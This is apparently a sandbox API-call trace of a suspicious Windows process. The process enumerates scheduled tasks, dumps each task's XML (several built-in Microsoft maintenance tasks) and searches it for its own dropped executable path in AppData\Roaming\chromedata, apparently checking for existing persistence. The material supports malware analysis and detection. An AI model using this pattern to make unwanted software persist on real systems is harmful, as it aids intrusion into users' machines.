	[0073.155] IRegisteredTaskCollection:get_Item (in: This=0x55fe90, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff30) returned 0x0
	[0073.155] IRegisteredTask:get_Name (in: This=0x55ff30, pName=0x128e3c | out: pName=0x128e3c*="KernelCeipTask") returned 0x0
	[0073.155] IRegisteredTask:get_Xml (in: This=0x55ff30, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\kernelceip.dll,-600)</Author>\r\n    <Source>$(@%SystemRoot%\\system32\\kernelceip.dll,-601)</Source>\r\n    <URI>\\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask</URI>\r\n    <Description>$(@%SystemRoot%\\system32\\kernelceip.dll,-602)</Description>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;LS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-09-01T03:30:00</StartBoundary>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Thursday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <RestartOnFailure>\r\n      <Interval>PT45M</Interval>\r\n      <Count>1</Count>\r\n    </RestartOnFailure>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT17H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n    </IdleSettings>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RequiredPrivileges>\r\n        <Privilege>SeChangeNotifyPrivilege</Privilege>\r\n      </RequiredPrivileges>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{e7ed314f-2816-4c26-aeb5-54a34d02404c}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.158] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\kernelceip.dll,-600)</Author>\r\n    <Source>$(@%SystemRoot%\\system32\\kernelceip.dll,-601)</Source>\r\n    <URI>\\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask</URI>\r\n    <Description>$(@%SystemRoot%\\system32\\kernelceip.dll,-602)</Description>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;LS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-09-01T03:30:00</StartBoundary>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Thursday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <RestartOnFailure>\r\n      <Interval>PT45M</Interval>\r\n      <Count>1</Count>\r\n    </RestartOnFailure>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT17H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n    </IdleSettings>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RequiredPrivileges>\r\n        <Privilege>SeChangeNotifyPrivilege</Privilege>\r\n      </RequiredPrivileges>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{e7ed314f-2816-4c26-aeb5-54a34d02404c}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.158] IUnknown:Release (This=0x55ff30) returned 0x0
	[0073.158] IRegisteredTaskCollection:get_Item (in: This=0x55fe90, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x3, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff30) returned 0x0
	[0073.158] IRegisteredTask:get_Name (in: This=0x55ff30, pName=0x128e3c | out: pName=0x128e3c*="UsbCeip") returned 0x0
	[0073.158] IRegisteredTask:get_Xml (in: This=0x55ff30, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%SystemRoot%\\system32\\usbceip.dll,-601)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\usbceip.dll,-600)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\usbceip.dll,-602)</Description>\r\n    <URI>Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip</URI>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-04-25T01:30:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>3</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <RestartOnFailure>\r\n      <Interval>PT45M</Interval>\r\n      <Count>1</Count>\r\n    </RestartOnFailure>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{c27f6b1d-fe0b-45e4-9257-38799fa69bc8}</ClassId>\r\n      <Data><![CDATA[SYSTEM]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.160] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%SystemRoot%\\system32\\usbceip.dll,-601)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\usbceip.dll,-600)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\usbceip.dll,-602)</Description>\r\n    <URI>Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip</URI>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-04-25T01:30:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>3</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <RestartOnFailure>\r\n      <Interval>PT45M</Interval>\r\n      <Count>1</Count>\r\n    </RestartOnFailure>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{c27f6b1d-fe0b-45e4-9257-38799fa69bc8}</ClassId>\r\n      <Data><![CDATA[SYSTEM]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.161] IUnknown:Release (This=0x55ff30) returned 0x0
	[0073.161] IUnknown:Release (This=0x55fe90) returned 0x0
	[0073.161] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe90) returned 0x0
	[0073.161] ITaskFolderCollection:get_Count (in: This=0x55fe90, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.161] IUnknown:Release (This=0x55fe90) returned 0x0
	[0073.161] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.161] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x8, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.161] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe50) returned 0x0
	[0073.162] IRegisteredTaskCollection:get_Count (in: This=0x55fe50, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.162] IRegisteredTaskCollection:get_Item (in: This=0x55fe50, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff38) returned 0x0
	[0073.162] IRegisteredTask:get_Name (in: This=0x55ff38, pName=0x128e3c | out: pName=0x128e3c*="ScheduledDefrag") returned 0x0
	[0073.162] IRegisteredTask:get_Xml (in: This=0x55ff38, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\defragsvc.dll,-800)</Source>\r\n    <Author>$(@%systemroot%\\system32\\defragsvc.dll,-801)</Author>\r\n    <Description>$(@%systemroot%\\system32\\defragsvc.dll,-802)</Description>\r\n    <URI>Microsoft\\Windows\\Defrag\\ScheduledDefrag</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"DefragWeeklyTrigger\">\r\n      <StartBoundary>2005-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Wednesday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n      <RandomDelay>PT2H</RandomDelay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>P7D</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>true</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\defrag.exe</Command>\r\n      <Arguments>-c</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.164] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\defragsvc.dll,-800)</Source>\r\n    <Author>$(@%systemroot%\\system32\\defragsvc.dll,-801)</Author>\r\n    <Description>$(@%systemroot%\\system32\\defragsvc.dll,-802)</Description>\r\n    <URI>Microsoft\\Windows\\Defrag\\ScheduledDefrag</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"DefragWeeklyTrigger\">\r\n      <StartBoundary>2005-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Wednesday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n      <RandomDelay>PT2H</RandomDelay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>P7D</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>true</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\defrag.exe</Command>\r\n      <Arguments>-c</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.165] IUnknown:Release (This=0x55ff38) returned 0x0
	[0073.165] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.165] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe50) returned 0x0
	[0073.165] ITaskFolderCollection:get_Count (in: This=0x55fe50, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.165] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.165] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.165] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x9, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.165] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe58) returned 0x0
	[0073.166] IRegisteredTaskCollection:get_Count (in: This=0x55fe58, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.166] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.166] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="Scheduled") returned 0x0
	[0073.166] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\sdiagschd.dll,-101)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\sdiagschd.dll,-102)</Source>\r\n    <Description>$(@%systemroot%\\system32\\sdiagschd.dll,-103)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Diagnosis\\Scheduled</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT8H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{c1f85ef8-bcc2-4606-bb39-70c523715eb3}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.169] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\sdiagschd.dll,-101)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\sdiagschd.dll,-102)</Source>\r\n    <Description>$(@%systemroot%\\system32\\sdiagschd.dll,-103)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Diagnosis\\Scheduled</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT8H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{c1f85ef8-bcc2-4606-bb39-70c523715eb3}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.169] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.169] IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.169] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe58) returned 0x0
	[0073.170] ITaskFolderCollection:get_Count (in: This=0x55fe58, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.170] IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.170] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.170] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0xa, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.170] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe60) returned 0x0
	[0073.171] IRegisteredTaskCollection:get_Count (in: This=0x55fe60, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0073.171] IRegisteredTaskCollection:get_Item (in: This=0x55fe60, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff58) returned 0x0
	[0073.171] IRegisteredTask:get_Name (in: This=0x55ff58, pName=0x128e3c | out: pName=0x128e3c*="Microsoft-Windows-DiskDiagnosticDataCollector") returned 0x0
	[0073.171] IRegisteredTask:get_Xml (in: This=0x55ff58, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\System32\\DFDTS.dll,-101)</Author>\r\n    <Source>$(@%SystemRoot%\\System32\\DFDTS.dll,-100)</Source>\r\n    <URI>Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\DFDTS.dll,-119)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <WakeToRun>false</WakeToRun>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T01:00:00</StartBoundary>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>2</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>dfdts.dll,DfdGetDefaultPolicyAndSMART</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
